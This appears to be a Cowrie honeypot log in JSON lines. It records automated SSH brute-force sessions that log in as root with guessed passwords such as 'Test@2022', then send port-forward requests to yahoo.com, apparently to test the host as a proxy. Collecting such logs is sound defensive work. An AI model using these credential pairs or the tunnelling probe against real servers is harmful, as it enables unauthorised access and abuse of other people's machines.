{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.804801Z","src_ip":"213.209.150.239","session":"34f1385696ea"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.852736Z","src_ip":"213.209.150.239","session":"34f1385696ea"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4487,"dst_ip":"1.2.3.4","dst_port":22,"session":"869ffdff197e","protocol":"ssh","message":"New connection: 213.209.150.239:4487 (1.2.3.4:22) [session: 869ffdff197e]","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.908463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.909346Z","src_ip":"213.209.150.239","session":"869ffdff197e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:27.965772Z","src_ip":"213.209.150.239","session":"869ffdff197e"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.055294Z","src_ip":"27.112.78.170","session":"41d07417cc21"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.247910Z","src_ip":"213.209.150.239","session":"869ffdff197e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":24999,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:24999","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.305745Z","session":"869ffdff197e"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":54138,"dst_ip":"1.2.3.4","dst_port":22,"session":"a53b55939501","protocol":"ssh","message":"New connection: 27.112.78.170:54138 (1.2.3.4:22) [session: a53b55939501]","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.321099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.322867Z","src_ip":"27.112.78.170","session":"a53b55939501"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.362398Z","src_ip":"213.209.150.239","session":"869ffdff197e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":13223,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:13223","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.519149Z","session":"869ffdff197e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.576310Z","src_ip":"213.209.150.239","session":"869ffdff197e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.587069Z","src_ip":"27.112.78.170","session":"a53b55939501"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.634328Z","src_ip":"213.209.150.239","session":"869ffdff197e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4543,"dst_ip":"1.2.3.4","dst_port":22,"session":"04fd8b6573f9","protocol":"ssh","message":"New connection: 213.209.150.239:4543 (1.2.3.4:22) [session: 04fd8b6573f9]","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.680305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.681496Z","src_ip":"213.209.150.239","session":"04fd8b6573f9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.731069Z","src_ip":"213.209.150.239","session":"04fd8b6573f9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:28.966771Z","src_ip":"213.209.150.239","session":"04fd8b6573f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":18843,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:18843","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.015063Z","session":"04fd8b6573f9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.062398Z","src_ip":"213.209.150.239","session":"04fd8b6573f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":8060,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:8060","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.197719Z","session":"04fd8b6573f9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.245332Z","src_ip":"213.209.150.239","session":"04fd8b6573f9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.293951Z","src_ip":"213.209.150.239","session":"04fd8b6573f9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4592,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfc13ddffe6e","protocol":"ssh","message":"New connection: 213.209.150.239:4592 (1.2.3.4:22) [session: dfc13ddffe6e]","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.349630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.350871Z","src_ip":"213.209.150.239","session":"dfc13ddffe6e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.407870Z","src_ip":"213.209.150.239","session":"dfc13ddffe6e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.687043Z","src_ip":"27.112.78.170","session":"a53b55939501"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.690458Z","src_ip":"213.209.150.239","session":"dfc13ddffe6e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":22382,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:22382","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.748149Z","session":"dfc13ddffe6e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.806244Z","src_ip":"213.209.150.239","session":"dfc13ddffe6e"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.951149Z","src_ip":"27.112.78.170","session":"8cb2b9aae99e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.952922Z","src_ip":"27.112.78.170","session":"a53b55939501"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":16075,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16075","sensor":"my-vps","timestamp":"2025-08-26T00:59:29.963031Z","session":"dfc13ddffe6e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.020117Z","src_ip":"213.209.150.239","session":"dfc13ddffe6e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.077669Z","src_ip":"213.209.150.239","session":"dfc13ddffe6e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4638,"dst_ip":"1.2.3.4","dst_port":22,"session":"fca3aa864f22","protocol":"ssh","message":"New connection: 213.209.150.239:4638 (1.2.3.4:22) [session: fca3aa864f22]","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.124282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.125556Z","src_ip":"213.209.150.239","session":"fca3aa864f22"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.173436Z","src_ip":"213.209.150.239","session":"fca3aa864f22"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.408045Z","src_ip":"213.209.150.239","session":"fca3aa864f22"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6276,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6276","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.456286Z","session":"fca3aa864f22"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.503734Z","src_ip":"213.209.150.239","session":"fca3aa864f22"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":16205,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:16205","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.641454Z","session":"fca3aa864f22"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.688619Z","src_ip":"213.209.150.239","session":"fca3aa864f22"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.736700Z","src_ip":"213.209.150.239","session":"fca3aa864f22"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":4691,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad0997492b2c","protocol":"ssh","message":"New connection: 213.209.150.239:4691 (1.2.3.4:22) [session: ad0997492b2c]","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.782646Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.783470Z","src_ip":"213.209.150.239","session":"ad0997492b2c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:30.830729Z","src_ip":"213.209.150.239","session":"ad0997492b2c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.065001Z","src_ip":"213.209.150.239","session":"ad0997492b2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":1654,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1654","sensor":"my-vps","timestamp":"2025-08-26T00:59:31.113013Z","session":"ad0997492b2c"}
